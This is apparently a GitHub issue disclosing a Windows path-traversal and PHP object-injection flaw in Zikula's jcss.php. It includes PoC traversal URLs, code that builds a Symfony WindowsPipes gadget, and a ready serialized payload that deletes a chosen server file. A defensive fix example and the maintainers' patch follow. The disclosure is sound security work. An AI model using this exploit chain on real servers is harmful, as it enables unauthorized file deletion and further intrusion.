
"jcss.php" file read vulnerability (windows environment) #3237

Closed
Xyntax opened this issue Dec 3, 2016 · 3 comments

@Xyntax

commented Dec 3, 2016

Relevant code in ./jcss.php:

```php
$f = (isset($_GET['f']) ? filter_var($_GET['f'], FILTER_SANITIZE_STRING) : false);

if (!$f) {
    header('HTTP/1.0 404 Not Found');
    exit;
}

// clean $f (only forward slashes are removed; backslashes pass through)
$f = preg_replace('`/`', '', $f);

// set full path to the file
$f = $ZConfig['System']['temp'] . '/Theme_cache/' . $f;

if (!is_readable($f)) {
    header('HTTP/1.0 400 Bad request');
    die('ERROR: Requested file not readable.');
}

// child lock
$signingKey = md5(serialize($ZConfig['DBInfo']['databases']['default']));

$contents = file_get_contents($f);
if (!DataUtil::is_serialized($contents, false)) {
    header('HTTP/1.0 500 Internal error');
    die('ERROR: Corrupted file.');
}

// the file contents are passed straight to unserialize()
$dataArray = unserialize($contents);
```

On the Windows platform we can bypass the regex filter with `..\`.
PoC: http://localhost/zikula4/jcss.php?f=..\..\..\..\..\jcss.php

The result of file_get_contents() is passed into unserialize(); when unserialize() is used on user-supplied data it often leads to PHP Object Injection.

Here we can launch further attacks with __destruct() in ./vendor/symfony/symfony/src/Symfony/Component/Process/Pipes/WindowsPipes.php.

PoC: delete files on the Windows server.

Add a public function to class WindowsPipes:

```php
public function setattr()
{
    $this->files = array('D:\phpStudy\WWW\zikula4\userdata\delete.txt'); // file you want to delete
    $this->fileHandles = array();
}
```

Serialize a WindowsPipes object and write it to a file:

```php
$obj = new WindowsPipes(true, null);
$obj->setattr();
file_put_contents('./exp.txt', serialize($obj));
```

Contents of exp.txt:

```
O:44:"Symfony\Component\Process\Pipes\WindowsPipes":8:{s:51:" Symfony\Component\Process\Pipes\WindowsPipes files";a:1:{i:0;s:21:".\userdata\delete.txt";}s:57:" Symfony\Component\Process\Pipes\WindowsPipes fileHandles";a:0:{}s:55:" Symfony\Component\Process\Pipes\WindowsPipes readBytes";a:2:{i:1;i:0;i:2;i:0;}s:59:" Symfony\Component\Process\Pipes\WindowsPipes disableOutput";b:1;s:5:"pipes";a:0:{}s:58:" Symfony\Component\Process\Pipes\AbstractPipes inputBuffer";s:0:"";s:52:" Symfony\Component\Process\Pipes\AbstractPipes input";N;s:54:" Symfony\Component\Process\Pipes\AbstractPipes blocked";b:1;}
```

Upload exp.txt to the ./userdata folder on the Windows server.
Then request http://localhost/zikula4/jcss.php?f=..\..\..\..\..\userdata\exp.txt, and your target file will be deleted (D:\phpStudy\WWW\zikula4\userdata\delete.txt in my test).
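As an added, defender-side example (not Zikula's code and not the fix in #3240), this is how the two weaknesses in the snippet above can be closed: a positive filename allow-list plus a realpath() containment check that rejects `\` as well as `/`, and an HMAC check on the cache file so unserialize() never runs on untrusted bytes. It assumes PHP 7.1+; the signed-file layout `<hex hmac>\n<serialized data>` is an assumption of this example, not the format jcss.php actually uses.

```php
<?php
// Added example, not Zikula's code. Assumes PHP 7.1+ and an assumed cache-file
// layout of "<hex hmac>\n<serialized data>".

// Resolve a user-supplied cache filename to an absolute path inside
// $cacheDir, or return null if the request must be rejected.
function resolveThemeCacheFile(string $cacheDir, string $f): ?string
{
    // Positive allow-list: no separator of any kind, so "/" and "\" (the
    // Windows bypass) are both rejected here, as is any "..".
    if (!preg_match('/\A[A-Za-z0-9_.-]+\z/', $f) || strpos($f, '..') !== false) {
        return null;
    }
    // realpath() canonicalises "..", symlinks and Windows separators; false if missing.
    $base = realpath($cacheDir);
    $path = realpath($cacheDir . DIRECTORY_SEPARATOR . $f);
    if ($base === false || $path === false) {
        return null;
    }
    // Containment check with a trailing separator, so that a sibling
    // directory such as "Theme_cache2" does not pass as "Theme_cache".
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Read a cache file and verify its HMAC before unserialize() sees it, so
// a file an attacker managed to place on disk is rejected as untrusted.
function loadSignedCache(string $path, string $signingKey): ?array
{
    $contents = file_get_contents($path);
    if ($contents === false || strpos($contents, "\n") === false) {
        return null;
    }
    list($mac, $payload) = explode("\n", $contents, 2);
    // Constant-time comparison of the stored tag against the recomputed one.
    if (!hash_equals(hash_hmac('sha256', $payload, $signingKey), $mac)) {
        return null;
    }
    // Even a correctly signed file may not instantiate objects: this keeps
    // WindowsPipes::__destruct() and every other gadget out of reach.
    $data = unserialize($payload, ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}

// Usage in jcss.php ($ZConfig and the key derivation are as in the original):
$signingKey = md5(serialize($ZConfig['DBInfo']['databases']['default']));
$path = resolveThemeCacheFile($ZConfig['System']['temp'] . '/Theme_cache', (string) ($_GET['f'] ?? ''));
$dataArray = $path === null ? null : loadSignedCache($path, $signingKey);
if ($dataArray === null) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
```

With this in place the traversal request above resolves to a path outside Theme_cache and is refused before file_get_contents(), and a file that does reach loadSignedCache() without a valid tag, or that contains a serialized object, is never turned into a live object.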

@Guite Guite added this to the 1.3.11 milestone Dec 3, 2016

@Guite Guite added the Bug label Dec 3, 2016

Guite added a commit that referenced this issue Dec 3, 2016

@Guite

Member

commented Dec 3, 2016

Hi @Xyntax

can you please verify whether #3240 correctly fixes this issue?

@Xyntax

Author

commented Dec 3, 2016

fixed

Guite added a commit that referenced this issue Dec 3, 2016

@Guite Guite closed this in 3ab9614 Dec 3, 2016

@Guite

Member

commented Dec 3, 2016

Fixed in 1.3 and 1.4:

1a8220a
3ab9614
